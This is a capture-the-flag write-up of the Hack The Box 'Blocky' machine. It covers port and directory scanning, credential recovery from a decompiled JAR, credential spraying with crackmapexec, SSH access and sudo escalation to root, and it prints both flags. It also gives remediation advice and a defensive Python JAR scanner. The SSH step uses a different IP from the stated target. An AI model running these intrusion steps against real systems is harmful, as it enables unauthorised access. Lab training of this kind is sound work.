Blocky HTB Writeup

Reconnaissance

Initial Enumeration

The penetration test began with network reconnaissance to identify open ports and services; the target address is kept in a shell variable for the commands that follow:

export target=10.129.48.128

Comprehensive Port Scan

sudo nmap -p- --min-rate 5000 -sT -vvv $target

Targeted Service Enumeration

sudo nmap -p 21,22,80,25565 -sC -sV -T4 $target

DNS Configuration

Added the hostname to the local hosts file for proper web application testing:

echo "10.129.48.128 blocky.htb" | sudo tee -a /etc/hosts

Web Application Assessment

Directory Bruteforcing

Conducted comprehensive directory enumeration using Gobuster:

gobuster dir -u http://blocky.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html -t 100 -b "302"

DirBuster can be used instead of Gobuster for the same enumeration.

Critical Discovery

The /plugins/ directory was identified as particularly interesting, containing Java archive files:

Source Code Analysis

Using jadx-gui, the BlockyCore.jar file was decompiled, revealing hardcoded database credentials:

Credentials Found:

User Enumeration

Additional reconnaissance uncovered potential usernames:

Initial Access

Credential Validation

Verified SSH credentials using CrackMapExec:

crackmapexec ssh 10.129.48.128 -u users.txt -p pass.txt

Successful Authentication

Gained initial access via SSH using discovered credentials:

ssh notch@10.129.48.174

Privilege Escalation

Privilege Assessment

Checked sudo permissions for the notch user:

sudo -l

Root Access Acquisition

The notch user had extensive sudo privileges, allowing direct elevation to root:

sudo su

Post-Exploitation

Flag Extraction

User Flag:

cat /home/notch/user.txt
83d32e43c1d7bdb805813bc15394c761

Root Flag:

cat /root/root.txt
97f70114622d2f0ec00963ed1caa998b

Security Assessment Summary

Critical Vulnerabilities Identified

  1. Information Disclosure
    • Hardcoded credentials in compiled Java binaries
    • Directory listing enabled on web server
  2. Weak Access Controls
    • Excessive sudo privileges for standard user accounts
    • Reuse of database credentials for system authentication
  3. Poor Credential Management
    • Plaintext passwords in application binaries
    • Password reuse across different services

Remediation Recommendations

  1. Implement Secure Coding Practices
    • Remove hardcoded credentials from application code
    • Use secure credential storage solutions
  2. Enforce Principle of Least Privilege
    • Review and restrict sudo permissions
    • Implement role-based access control
  3. Enhance System Hardening
    • Disable directory listing on web servers
    • Implement regular security audits
    • Use credential rotation policies
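The Source Code Analysis step and the first remediation item both come down to the same control: catching credential-looking string literals in shipped class files before a JAR is deployed. The following Python audit is an added example, not part of the original writeup or of the Blocky application; it parses each class file's constant pool inside a JAR, flags classes whose identifiers look credential-related (the sqlPass-style field names are an assumed pattern), and reports their string literals. The sample JAR and its class files are constructed in the script.

```python
import io, re, struct, zipfile
# Fixed payload sizes per constant-pool tag (JVM spec 4.4); Utf8 (tag 1) is variable-length.
FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4, 12: 4,
         15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}
SECRET_NAME = re.compile(r"pass|pwd|secret|token|apikey", re.I)  # assumed identifier heuristic
def parse_constant_pool(data):
    """Return (Utf8 entries by pool index, Utf8 indices referenced by CONSTANT_String)."""
    if data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a class file")
    count = struct.unpack(">H", data[8:10])[0]  # constant_pool_count = entries + 1
    pos, idx, utf8, literals = 10, 1, {}, set()
    while idx < count:
        tag, pos = data[pos], pos + 1
        if tag == 1:
            length = struct.unpack(">H", data[pos:pos + 2])[0]
            utf8[idx] = data[pos + 2:pos + 2 + length].decode("utf-8", "replace")
            pos += 2 + length
        elif tag == 8:
            literals.add(struct.unpack(">H", data[pos:pos + 2])[0])
            pos += 2
        else:
            pos += FIXED[tag]
        idx += 2 if tag in (5, 6) else 1  # Long/Double occupy two pool slots
    return utf8, literals
def suspicious_literals(data):
    """If a class names a credential-looking identifier, return its string literals."""
    utf8, literals = parse_constant_pool(data)
    if not any(SECRET_NAME.search(s) for i, s in utf8.items() if i not in literals):
        return []
    return sorted(utf8[i] for i in literals)
def scan_jar(jar_bytes):
    """Map each .class entry in the JAR to the literals a reviewer should inspect."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        hits = {n: suspicious_literals(jar.read(n)) for n in jar.namelist() if n.endswith(".class")}
    return {n: lits for n, lits in hits.items() if lits}
def _fake_class(field_name, literal):
    """Constructed sample: a minimal constant pool, not real javac output."""
    pool = b"".join(b"\x01" + struct.pack(">H", len(s)) + s
                    for s in (field_name.encode(), literal.encode()))
    pool += b"\x08\x00\x02" + b"\x05" + bytes(8) + b"\x07\x00\x01"  # String->#2, Long, Class->#1
    return b"\xca\xfe\xba\xbe\x00\x00\x00\x34" + struct.pack(">H", 7) + pool
def sample_jar():
    """Constructed sample JAR: one credential-bearing class and one benign class."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("com/example/Core.class", _fake_class("sqlPass", "hunter2"))
        jar.writestr("com/example/Util.class", _fake_class("greeting", "hello"))
    return buf.getvalue()
```

Run scan_jar over a build artefact in CI and fail the pipeline on any hit; a human then decides whether the literal is a real secret or a false positive such as a JDBC URL.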

Technical Details

Attack Chain

  1. Network reconnaissance → 2. Web directory enumeration → 3. Source code analysis → 4. Credential discovery → 5. SSH authentication → 6. Privilege escalation

Tools Utilized